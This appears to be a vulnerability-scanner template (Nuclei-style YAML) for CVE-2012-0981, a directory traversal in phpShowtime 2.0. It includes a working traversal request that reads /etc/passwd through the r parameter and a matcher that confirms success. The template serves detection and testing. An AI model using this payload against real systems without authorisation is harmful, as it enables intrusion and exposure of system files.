27 lines
703 B
YAML
27 lines
703 B
YAML
|
id: CVE-2012-0981
|
||
|
|
||
|
info:
|
||
|
name: phpShowtime 2.0 - Directory Traversal
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/18435
|
||
|
- https://www.cvedetails.com/cve/CVE-2012-0981
|
||
|
tags: cve,cve2012,lfi,phpshowtime
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|